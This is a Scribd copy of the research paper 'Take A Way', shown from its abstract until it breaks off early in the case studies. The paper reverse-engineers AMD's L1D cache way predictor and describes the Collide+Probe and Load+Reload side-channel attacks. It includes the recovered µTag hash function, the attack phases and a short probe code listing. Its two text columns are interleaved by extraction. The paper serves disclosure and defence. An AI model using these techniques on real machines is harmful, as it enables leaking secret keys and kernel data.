0% found this document useful (0 votes)

99 views13 pages

Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors

Gundam Takeaway

Uploaded by

Surya Adi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

99 views13 pages

Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors

Gundam Takeaway

Uploaded by

Surya Adi

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 13

Take A Way: Exploring the Security Implications of AMD’s

Cache Way Predictors

Moritz Lipp Vedad Hadžić Michael Schwarz
Graz University of Technology Graz University of Technology Graz University of Technology

Arthur Perais Clémentine Maurice Daniel Gruss

Unaffiliated Univ Rennes, CNRS, IRISA Graz University of Technology

ABSTRACT 1 INTRODUCTION
To optimize the energy consumption and performance of their With caches, out-of-order execution, speculative execution, or si-
CPUs, AMD introduced a way predictor for the L1-data (L1D) cache multaneous multithreading (SMT), modern processors are equipped
to predict in which cache way a certain address is located. Conse- with numerous features optimizing the system’s throughput and
quently, only this way is accessed, significantly reducing the power power consumption. Despite their performance benefits, these op-
consumption of the processor. timizations are often not designed with a central focus on security
In this paper, we are the first to exploit the cache way predic- properties. Hence, microarchitectural attacks have exploited these
tor. We reverse-engineered AMD’s L1D cache way predictor in optimizations to undermine the system’s security.
microarchitectures from 2011 to 2019, resulting in two new attack Cache attacks on cryptographic algorithms were the first mi-
techniques. With Collide+Probe, an attacker can monitor a vic- croarchitectural attacks [12, 42, 59]. Osvik et al. [58] showed that
tim’s memory accesses without knowledge of physical addresses an attacker can observe the cache state at the granularity of a cache
or shared memory when time-sharing a logical core. With Load+ set using Prime+Probe. Yarom et al. [82] proposed Flush+Reload,
Reload, we exploit the way predictor to obtain highly-accurate a technique that can observe victim activity at a cache-line granu-
memory-access traces of victims on the same physical core. While larity. Both Prime+Probe and Flush+Reload are generic techniques
Load+Reload relies on shared memory, it does not invalidate the that allow implementing a variety of different attacks, e.g., on cryp-
cache line, allowing stealthier attacks that do not induce any last- tographic algorithms [12, 15, 50, 54, 59, 63, 66, 82, 84], web server
level-cache evictions. function calls [85], user input [31, 48, 83], and address layout [25].
We evaluate our new side channel in different attack scenarios. Flush+Reload requires shared memory between the attacker and
We demonstrate a covert channel with up to 588.9 kB/s, which we the victim. When attacking the last-level cache, Prime+Probe re-
also use in a Spectre attack to exfiltrate secret data from the kernel. quires it to be shared and inclusive. While some Intel processors
Furthermore, we present a key-recovery attack from a vulnerable do not have inclusive last-level caches anymore [81], AMD always
cryptographic implementation. We also show an entropy-reducing focused on non-inclusive or exclusive last-level caches [38]. With-
attack on ASLR of the kernel of a fully patched Linux system, the out inclusivity and shared memory, these attacks do not apply to
hypervisor, and our own address space from JavaScript. Finally, we AMD CPUs.
propose countermeasures in software and hardware mitigating the With the recent transient-execution attacks, adversaries can di-
presented attacks. rectly exfiltrate otherwise inaccessible data on the system [41, 49,
68, 74, 75]. However, AMD’s microarchitectures seem to be vul-
CCS CONCEPTS nerable to only a few of them [9, 17]. Consequently, AMD CPUs
• Security and privacy → Side-channel analysis and counter- do not require software mitigations with high performance penal-
measures; Operating systems security. ties. Additionally, with the performance improvements of the latest
microarchitectures, the share of AMD CPU’s used is currently in-
ACM Reference Format:
creasing in the cloud [10] and consumer desktops [34].
Moritz Lipp, Vedad Hadžić, Michael Schwarz, Arthur Perais, Clémentine
Since the Bulldozer microarchitecture [6], AMD uses an L1D
Maurice, and Daniel Gruss. 2020. Take A Way: Exploring the Security
Implications of AMD’s Cache Way Predictors. In Proceedings of the 15th cache way predictor in their processors. The predictor computes a
ACM Asia Conference on Computer and Communications Security (ASIA CCS µTag using an undocumented hash function on the virtual address.
’20), June 1–5, 2020, Taipei, Taiwan. ACM, New York, NY, USA, 13 pages. This µTag is used to look up the L1D cache way in a prediction
https://doi.org/10.1145/3320269.3384746 table. Hence, the CPU has to compare the cache tag in only one
way instead of all possible ways, reducing the power consumption.
Permission to make digital or hard copies of all or part of this work for personal or In this paper, we present the first attacks on cache way predictors.
classroom use is granted without fee provided that copies are not made or distributed
for profit or commercial advantage and that copies bear this notice and the full citation For this purpose, we reverse-engineered the undocumented hash
on the first page. Copyrights for components of this work owned by others than the function of AMD’s L1D cache way predictor in microarchitectures
author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or from 2001 up to 2019. We discovered two different hash functions
republish, to post on servers or to redistribute to lists, requires prior specific permission
and/or a fee. Request permissions from [email protected]. that have been implemented in AMD’s way predictors. Knowledge
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan of these functions is the basis of our attack techniques. In the
© 2020 Copyright held by the owner/author(s). Publication rights licensed to ACM. first attack technique, Collide+Probe, we exploit µTag collisions of
ACM ISBN 978-1-4503-6750-9/20/06. . . $15.00
https://doi.org/10.1145/3320269.3384746
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

virtual addresses to monitor the memory accesses of a victim time- 2 BACKGROUND

sharing the same logical core. Collide+Probe does not require shared In this section, we provide background on CPU caches, cache at-
memory between the victim and the attacker, unlike Flush+Reload, tacks, high-resolution timing sources, simultaneous multithreading
and no knowledge of physical addresses, unlike Prime+Probe. In the (SMT), and way prediction.
second attack technique, Load+Reload, we exploit the property that
a physical memory location can only reside once in the L1D cache. 2.1 CPU Caches
Thus, accessing the same location with a different virtual address
evicts the location from the L1D cache. This allows an attacker to CPU caches are a type of memory that is small and fast, that the
monitor memory accesses on a victim, even if the victim runs on a CPU uses to store copies of data from main memory to hide the
sibling logical core. Load+Reload is on par with Flush+Reload in latency of memory accesses. Modern CPUs have multiple cache
terms of accuracy and can achieve a higher temporal resolution levels, typically three, varying in size and latency: the L1 cache is
as it does not invalidate a cache line in the entire cache hierarchy. the smallest and fastest, while the L3 cache, also called the last-level
This allows stealthier attacks that do not induce last-level-cache cache, is bigger and slower.
evictions. Modern caches are set-associative, i.e., a cache line is stored in a
We demonstrate the implications of Collide+Probe and Load+ fixed set determined by either its virtual or physical address. The L1
Reload in different attack scenarios. First, we implement a covert cache typically has 8 ways per set, and the last-level cache has 12 to
channel between two processes with a transmission rate of up to 20 ways, depending on the size of the cache. Each line can be stored
588.9 kB/s outperforming state-of-the-art covert channels. Second, in any of the ways of a cache set, as determined by the replacement
we use µTag collisions to reduce the entropy of different ASLR policy. While the replacement policy for the L1 and L2 data cache
implementations. We break kernel ASLR on a fully updated Linux on Intel is most of the time pseudo least-recently-used (LRU) [1],
system and demonstrate entropy reduction on user-space appli- the replacement policy for the last-level cache (LLC) can differ [79].
cations, the hypervisor, and even on our own address space from Intel CPUs until Sandy Bridge use pseudo least-recently-used (LRU),
sandboxed JavaScript. Furthermore, we successfully recover the for newer microarchitectures it is undocumented [79].
secret key using Collide+Probe on an AES T-table implementation. The last-level cache is physically indexed and shared across cores
Finally, we use Collide+Probe as a covert channel in a Spectre attack of the same CPU. In most Intel implementations, it is also inclusive
to exfiltrate secret data from the kernel. While we still use a cache- of L1 and L2, which means that all data in L1 and L2 is also stored
based covert channel, in contrast to previous attacks [41, 44, 51, 70], in the last-level cache. On AMD Zen processors, the L1D cache is
we do not rely on shared memory between the user application and virtually indexed and physically tagged (VIPT). The last-level cache
the kernel. We propose different countermeasures in software and is a non-inclusive victim cache. To maintain this property, every
hardware, mitigating Collide+Probe and Load+Reload on current line evicted from the last-level cache is also evicted from L1 and
systems and in future designs. L2. The last-level cache, though shared across cores, is also divided
into slices. The undocumented hash function that maps physical
Contributions. The main contributions are as follows: addresses to slices in Intel CPUs has been reverse-engineered [52].
(1) We reverse engineer the L1D cache way predictor of AMD
CPUs and provide the addressing functions for virtually all 2.2 Cache Attacks
microarchitectures. Cache attacks are based on the timing difference between accessing
(2) We uncover the L1D cache way predictor as a source of cached and non-cached memory. They can be leveraged to build
side-channel leakage and present two new cache-attack tech- side-channel attacks and covert channels. Among cache attacks,
niques, Collide+Probe and Load+Reload. access-driven attacks are the most powerful ones, where an attacker
(3) We show that Collide+Probe is on par with Flush+Reload monitors its own activity to infer the activity of its victim. More
and Prime+Probe but works in scenarios where other cache specifically, an attacker detects which cache lines or cache sets the
attacks fail. victim has accessed.
(4) We demonstrate and evaluate our attacks in sandboxed Access-driven attacks can further be categorized into two types,
JavaScript and virtualized cloud environments. depending on whether or not the attacker shares memory with
its victim, e.g., using a shared library or memory deduplication.
Responsible Disclosure. We responsibly disclosed our findings to Flush+Reload [82], Evict+Reload [31] and Flush+Flush [30] all rely
AMD on August 23rd, 2019. on shared memory that is also shared in the cache to infer whether
the victim accessed a particular cache line. The attacker evicts the
Outline. Section 2 provides background information on CPU shared data either by using the clflush instruction (Flush+Reload
caches, cache attacks, way prediction, and simultaneous multi- and Flush+Flush), or by accessing congruent addresses, i.e., cache
threading (SMT). Section 3 describes the reverse engineering of the lines that belong to the same cache set (Evict+Reload). These at-
way predictor that is necessary for our Collide+Probe and Load+ tacks have a very fine granularity (i.e., a 64-byte memory region),
Reload attack techniques outlined in Section 4. In Section 5, we but they are not applicable if shared memory is not available in the
evaluate the attack techniques in different scenarios. Section 6 dis- corresponding environment. Especially in the cloud, shared mem-
cusses the interactions between the way predictor and other CPU ory is usually not available across VMs as memory deduplication is
features. We propose countermeasures in Section 7 and conclude disabled for security concerns [76]. Irazoqui et al. [38] showed that
our work in Section 8. an attack similar to Flush+Reload is also possible in a cross-CPU
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

attack. It exploits that cache invalidations (e.g., from clflush) are than the rdtsc instruction on Intel CPUs. A counting thread con-
propagated to all physical processors installed in the same system. stantly increments a global variable used as a timestamp without
When reloading the data, as in Flush+Reload, they can distinguish relying on microarchitectural specifics and, thus, can also be used
the timing difference between a cache hit in a remote processor on AMD CPUs.
and a cache miss, which goes to DRAM.
The second type of access-driven attacks, called Prime+Probe [37, 2.4 Simultaneous Multithreading (SMT)
50, 59], does not rely on shared memory and is, thus, applicable to
Simultaneous Multithreading (SMT) allows optimizing the effi-
more restrictive environments. As the attacker has no shared cache
ciency of superscalar CPUs. SMT enables multiple independent
line with the victim, the clflush instruction cannot be used. Thus,
threads to run in parallel on the same physical core sharing the
the attacker has to access congruent addresses instead (cf. Evict+
same resources, e.g., execution units and buffers. This allows uti-
Reload). The granularity of the attack is coarser, i.e., an attacker only
lizing the available resources better, increasing the efficiency and
obtains information about the accessed cache set. Hence, this attack
throughput of the processor. While on an architectural level, the
is more susceptible to noise. In addition to the noise caused by other
threads are isolated from each other and cannot access data of other
processes, the replacement policy makes it hard to guarantee that
threads, on a microarchitectural level, the same physical resources
data is actually evicted from a cache set [29].
may be used. Intel introduced SMT as Hyperthreading in 2002. AMD
With the general development to switch from inclusive caches to
introduced 2-way SMT with the Zen microarchitecture in 2017.
non-inclusive caches, Intel introduced cache directories. Yan et al.
Recently, microarchitectural attacks also targeted different shared
[81] showed that the cache directory is still inclusive, and an at-
resources: the TLB [24], store buffer [16], execution ports [2, 13],
tacker can evict a cache directory entry of the victim to invalidate
fill-buffers [68, 75], and load ports [68, 75].
the corresponding cache line. This allows mounting Prime+Probe
and Evict+Reload attacks on the cache directory. They also ana-
lyzed whether the same attack works on AMD Piledriver and Zen 2.5 Way Prediction
processors and discovered that it does not, because these processors To look up a cache line in a set-associative cache, bits in the address
either do not use a directory or use a directory with high associa- determine in which set the cache line is located. With an n-way
tivity, preventing cross-core eviction either way. Thus, it remains cache, n possible entries need to be checked for a tag match. To
to be answered what types of eviction-based attacks are feasible on avoid wasting power for n comparisons leading to a single match,
AMD processors and on which microarchitectural structures. Inoue et al. [36] presented way prediction for set-associative caches.
Instead of checking all ways of the cache, a way is predicted, and
only this entry is checked for a tag match. As only one way is
2.3 High-resolution Timing activated, the power consumption is reduced. If the prediction is
For most cache attacks, the attacker requires a method to measure correct, the access has been completed, and access times similar to
timing differences in the range of a few CPU cycles. The rdtsc a direct-mapped cache are achieved. If the prediction is incorrect, a
instruction provides unprivileged access to a model-specific register normal associative check has to be performed.
returning the current cycle count and is commonly used for cache We only describe AMD’s way predictor [8, 23] in more detail
attacks on Intel CPUs. Using this instruction, an attacker can get in the following section. However, other CPU manufacturers hold
timestamps with a resolution between 1 and 3 cycles on modern patents for cache way prediction as well [56, 64]. CPU’s like the
CPUs. On AMD CPUs, this register has a cycle-accurate resolution Alpha 21264 [40] also implement way prediction to combine the
until the Zen microarchitecture. Since then, it has a significantly advantages of set-associative caches and the fast access time of a
lower resolution as it is only updated every 20 to 35 cycles (cf. direct-mapped cache.
Appendix A). Thus, rdtsc is only sufficient if the attacker can
repeat the measurement and use the average timing differences 3 REVERSE-ENGINEERING AMDS WAY
over all executions. If an attacker tries to monitor one-time events, PREDICTOR
the rdtsc instruction on AMD cannot directly be used to observe
In this section, we explain how to reverse-engineer the L1D way
timing differences, which are only a few CPU cycles.
predictor used in AMD CPUs since the Bulldozer microarchitecture.
The AMD Ryzen microarchitecture provides the Actual Perfor-
First, we explain how the AMD L1D way predictor predicts the
mance Frequency Clock Counter (APERF counter) [7] which can be
L1D cache way based on hashed virtual addresses. Second, we
used to improve the accuracy of the timestamp counter. However,
reverse-engineer the undocumented hash function used for the way
it can only be accessed in kernel mode. Although other timing
prediction in different microarchitectures. With the knowledge of
primitives provided by the kernel, such as get_monotonic_time,
the hash function and how the L1D way predictor works, we can
provide nanosecond resolution, they can be more noisy and still
then build powerful side-channel attacks exploiting AMD’s way
not sufficiently accurate to observe timing differences, which are
predictor.
only a few CPU cycles.
Hence, on more recent AMD CPUs, it is necessary to resort to a
different method for timing measurements. Lipp et al. [48] showed 3.1 Way Predictor
that counting threads can be used on ARM-based devices where Since the AMD Bulldozer microarchitecture, AMD uses a way pre-
unprivileged high-resolution timers are unavailable. Schwarz et al. dictor in the L1 data cache [6]. By predicting the cache way, the CPU
[66] showed that a counting thread can have a higher resolution only has to compare the cache tag in one way instead of all ways.
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

Way 1 Way n
Creating Sets. With the ability to detect conflicts, we can build
Set µ Tag ... µ Tag N sets representing the number of entries in the µTag table. First,
VA we create a pool v of virtual addresses, which all map to the same
cache set, i.e., where bits 6 to 11 of the virtual address are the same.
Hash

We start with one set S 0 containing one random virtual address

µTag
= =
out of the pool v. For each other randomly-picked address v x , we
measure the access time while alternatively accessing v x and an
Way Prediction Early Miss address from each set S 0...n . If we encounter a high access time,
we measure conflicts and add v x to that set. If v x does not conflict
L1D L2
with any existing set, we create a new set Sn+1 containing v x .
In our experiments, we recovered 256 sets. Due to measurement
Figure 1: Simplified illustration of AMD’s way predictor. errors caused by system noise, there are sets with single entries
that can be discarded. Furthermore, to retrieve all sets, we need to
make sure to test against virtual addresses where a wide range of
bits is set covering the yet unknown bits used by the hash function.
While this reduces the power consumption of an L1D lookup [8], it
may increase the latency in the case of a misprediction. Recovering the Hash Function. Every virtual address, which is in
Every cache line in the L1D cache is tagged with a linear-address- the same set, produces the same hash. To recover the hash function,
based µTag [8, 23]. This µTag is computed using an undocumented we need to find which bits in the virtual address are used for the
hash function, which takes the virtual address as the input. For 8 output bits that map to the 256 sets. Due to its linearity, each
every memory load, the way predictor predicts the cache way of output bit of the hash function can be expressed as a series of XORs
every memory load based on this µTag. As the virtual address, and of bits in the virtual address. Hence, we can express the virtual
thus the µTag, is known before the physical address, the CPU does addresses as an over-determined linear equation system in finite
not have to wait for the TLB lookup. Figure 1 illustrates AMD’s field 2, i.e., GF(2). The solutions of the equation system are then
way predictor. If there is no match for the calculated µTag, an early linear functions that produce the µTag from the virtual address.
miss is detected, and a request to L2 issued. To build the equation system, we use each of the virtual addresses
Aliased cache lines can induce performance penalties, i.e., two in the 256 sets. For every virtual address, the b bits of the virtual
different virtual addresses map to the same physical location. As address a are the coefficients, and the bits of the hash function x are
VIPT caches with a size lower or equal the number of ways multi- the unknown. The right-hand side of the equation y is the same for
plied by the page size behave functionally like PIPT caches. Hence, all addresses in the set. Hence, for every address a in set s, we get
there are no duplicates for aliased addresses and, thus, in such a an equation of the form ab−1xb−1 ⊕ ab−2xb−2 ⊕ · · · ⊕ a 12x 12 = ys .
case where data is loaded from an aliased address, the load sees an While the least-significant bits 0-5 define the cache line offset,
L1D cache miss and thus loads the data from the L2 data cache [8]. note that bits 6-11 determine the cache set and are not used for the
If there are multiple memory loads from aliased virtual addresses, µTag computation [8]. To solve the equation system, we used the
they all suffer an L1D cache miss. The reason is that every load Z3 SMT solver. Every solution vector represents a function which
updates the µTag and thus ensures that any other aliased address XORs the virtual-address bits that correspond to ‘1’-bits in the
sees an L1D cache miss [8]. In addition, if two different virtual solution vector. The hash function is the set of linearly independent
addresses yield the same µTag, accessing one after the other yields functions, i.e., every linearly independent function yields one bit
a conflict in the µTag table. Thus, an L1D cache miss is suffered, of the hash function. The order of the bits cannot be recovered.
and the data is loaded from the L2 data cache. However, this is not relevant, as we are only interested whether
addresses collide, not in their numeric µTag value.
3.2 Hash Function We successfully recovered the undocumented µTag hash func-
tion on the AMD Zen, Zen+ and Zen 2 microarchitecture. The
The L1D way predictor computes a hash (µTag) from the virtual
function illustrated in Figure 3a uses bits 12 to 27 to produce an
address, which is used for the lookup to the way-predictor table.
8-bit value mapping to one of the 256 sets:
We assume that this undocumented hash function is linear based
on the knowledge of other such hash functions, e.g., the cache-slice h(v) = (v 12 ⊕ v 27 ) ∥ (v 13 ⊕ v 26 ) ∥ (v 14 ⊕ v 25 ) ∥ (v 15 ⊕ v 20 ) ∥
function of Intel CPUs [52], the DRAM-mapping function of Intel, (v 16 ⊕ v 21 ) ∥ (v 17 ⊕ v 22 ) ∥ (v 18 ⊕ v 23 ) ∥ (v 19 ⊕ v 24 )
ARM, and AMD CPUs [5, 60, 71], or the hash function for indirect
branch prediction on Intel CPUs [41]. Moreover, we expect the size We recovered the same function for various models of the AMD
of the µTag to be a power of 2, resulting in a linear function. Zen microarchitectures that are listed in Table 1. For the Bulldozer
We rely on µTag collisions to reverse-engineer the hash function. microarchitecture (FX-4100), the Piledriver microarchitecture (FX-
We pick two random virtual addresses that map to the same cache 8350), and the Steamroller microarchitecture (A10-7870K), the hash
set. If the two addresses have the same µTag, repeatedly accessing function uses the same bits but in a different combination Figure 3b.
them one after the other results in conflicts. As the data is then
loaded from the L2 cache, we can either measure an increased access 3.3 Simultaneous Multithreading
time or observe an increased number in the performance counter As AMD introduced simultaneous multithreading starting with the
for L1 misses, as illustrated in Figure 2. Zen microarchitecture, the filed patent [23] does not cover any
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

2,000
Non-colliding addresses
Hence, we extend the experiment in accessing addresses mapping
Measurements

1,500 Colliding addresses to all possible µTags on one hardware thread (and all possible cache
1,000 sets). While we repeatedly accessed one of these addresses on one
hardware thread, we measure the number of L1 misses to a single
500
virtual address on the sibling thread. However, we are not able to
0
observe any collisions and, thus, conclude that either individual
0 50 100 150 200
structures are used per thread or that they are shared but tagged for
Access time (increments)
each thread. The only exceptions are aliased loads as the hardware
updates the µTag in the aliased way (see Section 3.1).
Figure 2: Measured duration of 250 alternating accesses to In another experiment, we measure access times of two virtual
addresses with and without the same µTag. addresses that are mapped to the same physical address. As docu-
mented [8], loads to an aliased address see an L1D cache miss and,
f1 thus, load the data from the L2 data cache. While we verified this
f2
f3
behavior, we additionally observed that this is also the case if the
... 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 ...
other thread performs the other load. Hence, the structure used is
f4
searched by the sibling thread, suggesting a competitively shared
f5 structure that is tagged with the hardware threads.
f6
f7
f8
4 USING THE WAY PREDICTOR FOR SIDE
(a) Zen, Zen+, Zen 2 CHANNELS
f1
f2
In this section, we present two novel side channels that leverage
f3 AMD’s L1D cache way predictor. With Collide+Probe, we moni-
f4
f5 tor memory accesses of a victim’s process without requiring the
f6
f7 knowledge of physical addresses. With Load+Reload, while relying
f8
on shared memory similar to Flush+Reload, we can monitor mem-
... ...
27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12
ory accesses of a victim’s process running on the sibling hardware
thread without invalidating the targeted cache line from the entire
(b) Bulldozer, Piledriver, Steamroller cache hierarchy.

Figure 3: The recovered hash functions use bits 12 to 27 of 4.1 Collide+Probe

the virtual address to compute the µTag. Collide+Probe is a new cache side channel exploiting µTag collisions
in AMD’s L1D cache way predictor. As described in Section 3, the
way predictor uses virtual-address-based µTags to predict the L1D
insights on how the way predictor might handle multiple threads. cache way. If an address is accessed, the µTag is computed, and the
While the way predictor has been used since the Bulldozer microar- way-predictor entry for this µTag is updated. If a subsequent access
chitecture [6], parts of the way predictor have only been docu- to a different address with the same µTag is performed, a µTag
mented with the release of the Zen microarchitecture [8]. However, collision occurs, and the data has to be loaded from the L2D cache,
the influence of simultaneous multithreading is not mentioned. increasing the access time. With Collide+Probe, we exploit this
Typically, two sibling threads can either share a hardware struc- timing difference to monitor accesses to such colliding addresses.
ture competitively with the option to tag entries or by statically Threat Model. For this attack, we assume that the attacker has un-
partitioning them. For instance, on the Zen microarchitecture, ex- privileged native code execution on the target machine and runs on
ecution units, schedulers, or the cache are competitively shared, the same logical CPU core as the victim. Furthermore, the attacker
and the store queue and retire queue are statically partitioned [18]. can force the execution of the victim’s code, e.g., via a function call
Although the load queue, as well as the instruction and data TLB, in a library or a system call.
are competitively shared between the threads, the data in these
structures can only be accessed by the thread owning it. Setup. The attacker first chooses a virtual address v of the victim
Under the assumption that the data structures of the way pre- that should be monitored for accesses. This can be an arbitrary
dictor are competitively shared between threads, one thread could valid address in the victim’s address space. There are no constraints
directly influence the sibling thread, enabling cross-thread attacks. in choosing the address. The attacker can then compute the µTag
We validate this assumption by accessing two addresses with the µv of the target address using the hash function from Section 3.2.
same µTag on both threads. However, we do not observe collisions, We assume that ASLR is either not active or has already been
neither by measuring the access time nor in the number of L1 misses. broken (cf. Section 5.2). However, although with ASLR, the actual
While we reverse-engineered the same mapping function (see Sec- virtual address used in the victim’s process are typically unknown
tion 3.2) for both threads, the possibility remains that additional to the attacker, it is still possible to mount an attack. Instead of
per-thread information is used for selecting the data-structure entry, choosing a virtual address, the attacker initially performs a cache
allowing one thread to evict entries of the other. template attack [31] to detect which of 256 possible µTags should
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

be monitored. Similar to Prime+Probe [58], where the attacker 1 access(colliding_address);

monitors the activity of cache sets, the attacker monitors µTag 2 run_victim();
3 size_t begin = get_time();
collisions while triggering the victim. 4 access(colliding_address);
5 size_t end = get_time() − begin;
Attack. To mount a Collide+Probe attack, the attacker selects a 6 if ((end − begin) > THRESHOLD) report_event();
virtual address v ′ in its own address space that yields the same
µTag µv ′ as the target address v, i.e., µv = µv ′ . As there are only Listing 1: Implementation of the Collide+Probe attack
256 different µTags, this can easily be done by randomly choosing
addresses until the chosen address has the same µTag. Moreover,
both v and v ′ have to be in the same cache set. However, this is easily of Collide+Probe over Prime+Probe is that a single memory load is
satisfiable, as the cache set is determined by bits 6-11 of the virtual enough to guarantee that a subsequent load with the same µTag
address. The attack consists of 3 phases performed repeatedly: is served from the L2 cache. With Prime+Probe, multiple loads
Phase 1: Collide. In the first phase, the attacker accesses the are required to ensure that the target address is evicted from the
pre-computed address v ′ and, thus, updates the way predictor. The cache. In modern Prime+Probe attacks, the last-level cache is tar-
way predictor associates the cache line of v ′ with its µTag µv ′ and geted [37, 48, 50, 63, 67], and knowledge of physical addresses is
subsequent memory accesses with the same µTag are predicted to required to compute both the cache set and cache slice [52]. While
be in the same cache way. Since the victim’s address v has the same Collide+Probe requires knowledge of virtual addresses, they are
µTag (µv = µv ′ ), the µTag of that cache line is marked invalid and typically easier to get than physical addresses. In contrast to Flush+
the data is effectively inaccessible from the L1D cache. Reload, Collide+Probe does neither require any specific instruc-
Phase 2: Scheduling the victim. In the second phase, the vic- tions like clflush nor shared memory between the victim and the
tim is scheduled to perform its operations. If the victim does not attacker. A disadvantage is that distinguishing L1D from L2 hits
access the monitored address v, the way predictor remains in the in Collide+Probe requires a timing primitive with higher precision
same state as set up by the attacker. Thus, the attacker’s data is still than required to distinguish cache hits from misses in Flush+Reload.
accessible from the L1D cache. However, if the victim performs an
access to the monitored address v, the way predictor is updated 4.2 Load+Reload
again causing the attacker’s data to be inaccessible from L1D. Load+Reload exploits the way predictor’s behavior for aliased ad-
Phase 3: Probe. In the third and last phase of the attack, the dress, i.e., virtual addresses mapping to the same physical address.
attacker measures the access time to the pre-computed address v ′ . If When accessing data through a virtual-address alias, the data is
the victim has not accessed the monitored address v, the data of the always requested from the L2 cache instead of the L1D cache [8]. By
pre-computed address v ′ is still accessible from the L1D cache and monitoring the performance counter for L1 misses, we also observe
the way prediction is correct. Thus, the measured access time is fast. this behavior across hardware threads. Consequently, this allows
If the victim has accessed the monitored address v and thus changed one thread to evict shared data used by the sibling thread with a
the state of the way predictor, the attacker suffers an L1D cache miss single load. Although the requested data is stored in the L1D cache,
when accessing v ′ , as the prediction is now incorrect. The data of it remains inaccessible for the other thread and, thus, introduces a
the pre-computed address v ′ is loaded from the L2 cache and, thus, timing difference when it is accessed.
the measured access time is slow. By distinguishing between these
cases, the attacker can deduce whether the victim has accessed the Threat Model. For this attack, we assume that the attacker has
targeted data. unprivileged native code execution on the target machine. The
Listing 1 shows an implementation of the Collide+Probe attack attacker and victim run simultaneously on the same physical but
where the colliding address colliding_address is computed be- different logical CPU thread. The attack target is a memory location
forehand. The code closely follows the three attack phases. First, with virtual address v shared between the attacker and victim, e.g.,
the colliding address is accessed. Then, the victim is scheduled, il- a shared library.
lustrated by the run_victim function. Afterwards, the access time
Attack. Load+Reload exploits the timing difference when access-
to the same address is measured where the get_time function is
ing a virtual-address alias v ′ to build a cross-thread attack on shared
implemented using a timing source discussed in Section 2.3. The
memory. The attack consists of 3 phases:
measured access time allows the attacker to distinguish between an
Phase 1: Load. In contrast to Flush+Reload, where the targeted
L1D cache hit and an L2-cache hit and, thus, deduce if the victim
address v is flushed from the cache hierarchy, Load+Reload loads
has accessed the targeted address. As other accesses with the same
an address v ′ with the same physical tag as v in the first phase.
cache set influence the measurements, the attacker can repeat the
Thereby, it renders the cache line containing v inaccessible from
experiment to average out the measured noise.
the L1D cache for the sibling thread.
Comparison to Other Cache Attacks. Finally, we want to discuss Phase 2: Scheduling the victim. In the second phase, the vic-
the advantages and disadvantages of the Collide+Probe attack in tim process is scheduled. If the victim process accesses the targeted
comparison to other cache side-channel attacks. In contrast to cache line with address v, it sees an L1D cache miss. As a result, it
Prime+Probe, no knowledge of physical addresses is required as loads the data from the L2 cache, invalidating the attacker’s cache
the way predictor uses the virtual address to compute µTags. Thus, line with address v ′ in the process.
with native code execution, an attacker can find addresses corre- Phase 3: Reload. In the third phase, the attacker measures the
sponding to a specific µTag without any effort. Another advantage access time to the address v ′ . If the victim process has accessed the
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

cache line with address v, the attacker observes an L1D cache miss Table 1: Tested CPUs with their microarchitecture (µ-arch.)
and loads the data from the L2 cache, resulting in a higher access and whether they have a way predictor (WP).
time. Otherwise, if the victim has not accessed the cache line with
address v, it is still accessible in the L1D cache for the attacker and, Setup CPU µ-arch. WP
thus, a lower access time is measured. By distinguishing between
Lab AMD Athlon 64 X2 3800+ K8 ✗
both cases, the attacker can deduce whether the victim has accessed
Lab AMD Turion II Neo N40L K10 ✗
the address v. Lab AMD Phenom II X6 1055T K10 ✗
Comparison with Flush+Reload. While Flush+Reload invalidates a Lab AMD E-450 Bobcat ✗
Lab AMD Athlon 5350 Jaguar ✗
cache line from the entire cache hierarchy, Load+Reload only evicts
Lab AMD FX-4100 Bulldozer ✓
the data for the sibling thread from the L1D. Thus, Load+Reload is
Lab AMD FX-8350 Piledriver ✓
limited to cross-thread scenarios, while Flush+Reload is applicable
Lab AMD A10-7870K Steamroller ✓
to cross-core scenarios too. Lab AMD Ryzen Threadripper 1920X Zen ✓
Lab AMD Ryzen Threadripper 1950X Zen ✓
5 CASE STUDIES Lab AMD Ryzen Threadripper 1700X Zen ✓
To demonstrate the impact of the side channel introduced by the Lab AMD Ryzen Threadripper 2970WX Zen+ ✓
µTag, we implement different attack scenarios. In Section 5.1, we Lab AMD Ryzen 7 3700X Zen 2 ✓
implement a covert channel between two processes with a transmis- Cloud AMD EPYC 7401p Zen ✓
sion rate of up to 588.9 kB/s outperforming state-of-the-art covert Cloud AMD EPYC 7571 Zen ✓
channels. In Section 5.2, we break kernel ASLR, demonstrate how
user-space ASLR can be weakened, and reduce the ASLR entropy
of the hypervisor in a virtual-machine setting. In Section 5.3, we
use Collide+Probe as a covert channel to extract secret data from To encode a 1-bit to transmit, the sender accesses address v S .
the kernel in a Spectre attack. In Section 5.4, we recover secret keys To transmit a 0-bit, the sender does not access address v S . The
in AES T-table implementations. receiving end decodes the transmitted information by measuring
the access time when loading address v R . If the sender has accessed
Timing Measurement. As explained in Section 2.3, we cannot rely address v S to transmit a 1, the collision caused by the same µTag
on the rdtsc instruction for high-resolution timestamps on AMD of v S and v R results in a slow access time for the receiver. If the
CPUs since the Zen microarchitecture. As we use recent AMD sender has not accessed address v S , no collision caused the address
CPUs for our evaluation, we use a counting thread (cf. Section 2.3) v R to be evicted from L1D and, thus, the access time is fast. This
running on the sibling logical CPU core for most of our experiments timing difference allows the receiver to decode the transmitted bit.
if applicable. In other cases, e.g., a covert channel scenario, the Different cache-based covert channels use the same side chan-
counting thread runs on a different physical CPU core. nel to transmit multiple bits at once. For instance, different cache
lines [30, 48] or different cache sets [48, 53] are used to encode
